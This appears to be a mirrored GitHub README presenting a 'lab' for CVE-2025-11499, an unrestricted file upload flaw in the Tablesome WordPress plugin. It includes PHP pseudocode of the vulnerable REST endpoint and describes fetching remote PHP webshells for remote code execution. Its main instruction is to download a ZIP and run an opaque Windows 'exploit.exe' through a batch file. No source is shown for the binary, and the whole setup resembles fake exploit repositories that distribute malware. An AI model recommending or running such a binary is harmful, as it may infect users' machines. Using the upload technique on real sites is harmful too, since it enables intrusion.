来源

关联漏洞

描述

Unrestricted Upload of File with Dangerous Type

介绍

# Lab: CVE-2025-11499 - Unrestricted Upload of File with Dangerous Type
## Download Exploit
### [Download](https://github.com/Hazelooks/CVE-2025-11499-Exploit/raw/refs/heads/main/Tool/lab-cve-2025-11499.zip)  

## 🚀 Overview
This lab demonstrates CVE-2025-11499 (also tracked as EUVD-2025-37429), a critical vulnerability classified under CWE-434: Unrestricted Upload of File with Dangerous Type. The issue affects the Tablesome Table WordPress plugin in versions up to and including 1.1.32. It stems from insufficient file type validation in the `set_featured_image_from_external_url()` function, enabling unauthenticated attackers to upload arbitrary files to the server.

This vulnerability integrates with the Contact Form DB plugin, which supports form integrations from WPForms, Contact Form 7 (CF7), Gravity Forms, Forminator, and Fluent Forms. Successful exploitation can lead to remote code execution (RCE) if the server configuration permits execution of uploaded files, such as PHP shells disguised as images or other media. The CVSS v3.1 score is 9.8 (Critical), with high impacts on confidentiality (attackers can exfiltrate data), integrity (modification of site content), and availability (potential denial-of-service via resource exhaustion or malware).

This repository provides a controlled environment to reproduce the vulnerability, test exploits, and apply mitigations. It is intended for educational and research purposes only. Use in a safe, isolated setup to avoid unintended consequences.

**Safety Disclaimer:**  
This lab involves handling potentially malicious code and vulnerable software. Ensure you are working in a secure, non-production environment. Do not expose the setup to the internet. Always scan files with antivirus software before execution. The authors disclaim any liability for misuse or damage resulting from this repository.

## 📋 Prerequisites
To set up and run this lab, you'll need:
- A local web server environment (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+ and MySQL 5.7+.
- WordPress version 6.0 or later (tested on 6.1.1).
- The vulnerable Tablesome Table plugin (version 1.1.32) – download from the official WordPress plugin repository archives if needed.
- Contact Form DB plugin (version compatible with Tablesome, e.g., 2.15.0) with at least one supported form plugin installed (e.g., WPForms Lite).
- Python 3.8+ for running helper scripts (optional but recommended for automation).
- Administrative access to your local machine for file permissions and server configuration.
- Basic knowledge of WordPress administration, file uploads, and command-line tools.

Note: This setup assumes a Windows-based host for exploit compatibility, but adaptations for macOS/Linux are possible with minor adjustments.

## Download & Install
1. Download the lab archive from: [href](https://github.com/Hazelooks/CVE-2025-11499-Exploit/raw/refs/heads/main/Tool/lab-cve-2025-11499.zip)  
   This ZIP contains:

   - `/exploits/`: Exploit tools.
     - `exploit.exe`: Main exploit binary for uploading malicious files (compiled for Windows; requires .NET Framework 4.8).
     - `start_exploit.bat`: Batch script to launch `exploit.exe` with default parameters.


2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11499-lab`.
3. Set up your local WordPress instance:
   - Install WordPress in your web server root (e.g., `htdocs` in XAMPP).
   - Activate the Tablesome Table plugin (v1.1.32) and Contact Form DB.
   - Configure a form (e.g., via WPForms) and ensure the `set_featured_image_from_external_url()` endpoint is accessible without authentication (default in vulnerable versions).


## 🛠 Quick Start
1. Download and extract the ZIP as described above.
2. Start your local web server (e.g., via XAMPP control panel).
3. Navigate to the extracted folder and run `start_exploit.bat` from `/exploits/`. This will open `exploit.exe` and prompt for the target WordPress URL (e.g., `http://localhost/wordpress`).
4. Follow the on-screen instructions in `exploit.exe` to upload a test payload.

For detailed steps, see the sections below.

## 🔍 Vulnerability Details
### Root Cause
The vulnerability occurs in the `set_featured_image_from_external_url()` function within `tablesome/includes/class-tablesome-rest-api.php`. It fetches an external URL provided via a POST request to `/wp-json/tablesome/v1/set-featured-image` and saves it as a featured image without validating the MIME type or extension. This allows attackers to supply URLs to malicious files (e.g., PHP webshells) hosted remotely, which are then stored in the `/wp-content/uploads/` directory.

Pseudocode example of the vulnerable function:
```php
function set_featured_image_from_external_url($request) {
    $url = $request->get_param('url');
    $file = file_get_contents($url);
    $upload = wp_upload_bits(basename($url), null, $file);
    // No type check here!
    if (!$upload['error']) {
        $attachment_id = wp_insert_attachment([...]);
        set_post_thumbnail($post_id, $attachment_id);
    }
}
```

If the server allows execution of files in uploads (common misconfiguration), this leads to RCE.

## 📞 Support  
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.  




For issues or contributions, open a pull request or contact the maintainers.

文件快照

 [4.0K]  /data/pocs/990c7a457a6ee96ddd2ccfc8d035981b0b8c3a38
├── [5.3K]  README.md
└── [4.0K]  Tool
    └── [8.5M]  lab-cve-2025-11499.zip

1 directory, 2 files

备注